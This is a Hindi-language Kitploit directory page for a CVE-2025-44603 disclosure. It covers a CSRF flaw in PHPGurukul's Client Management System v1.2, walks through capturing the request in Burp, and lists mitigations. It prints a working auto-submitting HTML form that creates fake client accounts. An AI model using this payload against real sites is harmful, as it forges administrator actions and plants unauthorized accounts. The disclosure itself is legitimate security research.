Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers — एक PHP-आधारित क्लाइंट प्रबंधन प्रणाली में CSRF कमजोरी को प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें HTML एक्सप्लॉइट कोड और वेब एप्लिकेशन सुरक्षा परीक्षण के लिए शमन रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

एक PHP-आधारित क्लाइंट प्रबंधन प्रणाली में CSRF कमजोरी को प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें HTML एक्सप्लॉइट कोड और वेब एप्लिकेशन सुरक्षा परीक्षण के लिए शमन रणनीतियाँ शामिल हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-44603 (CSRF भेद्यता: नकली ग्राहक बनाने की ओर ले जाती है)

परियोजना का नाम और रेपो URL : https://phpgurukul.com/client-management-system-using-php-mysql/

भेद्यता का नाम : क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)

प्रभावित संस्करण : V1.2

परिचय

क्लाइंट मैनेजमेंट सिस्टम (PHPGurukul द्वारा विकसित) के ग्राहक जोड़ने की कार्यक्षमता में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है। CSRF एक हमला है जिसमें एक प्रमाणित उपयोगकर्ता को वेब एप्लिकेशन पर एक दुर्भावनापूर्ण अनुरोध सबमिट करने के लिए बरगलाया जाता है। इससे उपयोगकर्ता की ओर से अनधिकृत कार्य किए जा सकते हैं। इस रिपोर्ट में, हम प्रदर्शित करते हैं कि CSRF का उपयोग क्लाइंट मैनेजमेंट सिस्टम में नकली उपयोगकर्ता बनाने के लिए कैसे किया जा सकता है और शमन रणनीतियाँ सुझाते हैं।

वातावरण सेटअप

  • MySQL और PHP का उपयोग करके स्थानीय रूप से होस्ट किया गया क्लाइंट मैनेजमेंट सिस्टम।
  • ग्राहकों और उनकी सेवाओं को जोड़ने की कार्यक्षमता।

CSRF का शोषण करने के चरण

1. व्यवस्थापक के रूप में लॉगिन करें

दिए गए क्रेडेंशियल का उपयोग करके, क्लाइंट मैनेजमेंट सिस्टम में लॉगिन करें।

व्यवस्थापक के रूप में लॉगिन

2. एक नया ग्राहक जोड़ें

  • ग्राहक जोड़ें विकल्प चुनें।
  • आवश्यक ग्राहक विवरण दर्ज करें।

नया ग्राहक जोड़ना ग्राहक विवरण दर्ज करें

3. ग्राहक जोड़ने का अनुरोध कैप्चर करें

  1. सहेजें बटन पर जाएं।
  2. अनुरोधों को इंटरसेप्ट करने के लिए Burp Suite सेट करें।
  3. सहेजें पर क्लिक करें और सर्वर तक पहुंचने से पहले HTTP अनुरोध को कैप्चर करें।
  4. कैप्चर किए गए अनुरोध को विश्लेषण के लिए सत्र कुकी के बिना Repeater टैब पर भेजें।

Burp में अनुरोध कैप्चर करना Repeater पर भेजें

नकली ग्राहकों के लिए CSRF कोड

CSRF हमले के लिए HTML PoC नीचे दिया गया है:

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

नकली ग्राहक बनाना

  • नकली ग्राहक बनाने के लिए मौजूदा विवरण में संशोधन करें

नकली उपयोगकर्ता जोड़ना 1 नकली उपयोगकर्ता जोड़ना 2

CSRF PoC का परीक्षण

  1. ब्राउज़र में उत्पन्न CSRF PoC लिंक खोलें।
  2. वेबपेज सबमिट बटन के साथ खुलता है।
  3. सबमिट पर क्लिक करें, और अनुरोध निष्पादित होता है, जिससे नकली ग्राहक बनते हैं।

ब्राउज़र में PoC खोलें सबमिट अनुरोध दबाएं

नकली ग्राहक निर्माण की पुष्टि

  • सबमिशन के बाद, व्यवस्थापक डैशबोर्ड में नकली ग्राहक दिखाई देते हैं।

नकली ग्राहक बनाए गए एकाधिक उपयोगकर्ता बनाए गए

शमन रणनीतियाँ

CSRF हमलों को रोकने के लिए, निम्नलिखित उपायों को लागू करें:

  1. CSRF टोकन
    • सभी फॉर्म सबमिशन में एंटी-CSRF टोकन का उपयोग करें और उन्हें सर्वर-साइड पर सत्यापित करें।
  2. SameSite कुकीज़
    • सत्र कुकीज़ को SameSite=Strict या SameSite=Lax विशेषताओं के साथ सेट करें।
  3. Referer और Origin हेडर सत्यापन
    • अनुरोधों को संसाधित करने से पहले Referer और Origin हेडर को सत्यापित करें।
  4. उपयोगकर्ता प्रमाणीकरण जांच
    • महत्वपूर्ण कार्यों के लिए स्वचालित हमलों को रोकने हेतु CAPTCHA की आवश्यकता रखें।
  5. HTTP विधियों को प्रतिबंधित करें
    • संवेदनशील कार्यों के लिए POST का उपयोग करें और साइड इफेक्ट वाले GET अनुरोधों को संसाधित करने से बचें।

निष्कर्ष

यह रिपोर्ट प्रदर्शित करती है कि CSRF भेद्यताओं का शोषण करके क्लाइंट मैनेजमेंट सिस्टम में अनधिकृत ग्राहक कैसे बनाए जा सकते हैं। सुझाई गई शमन रणनीतियों को लागू करने से एप्लिकेशन को ऐसे हमलों से सुरक्षित रखने में मदद मिलेगी।

टूल डाउनलोड करें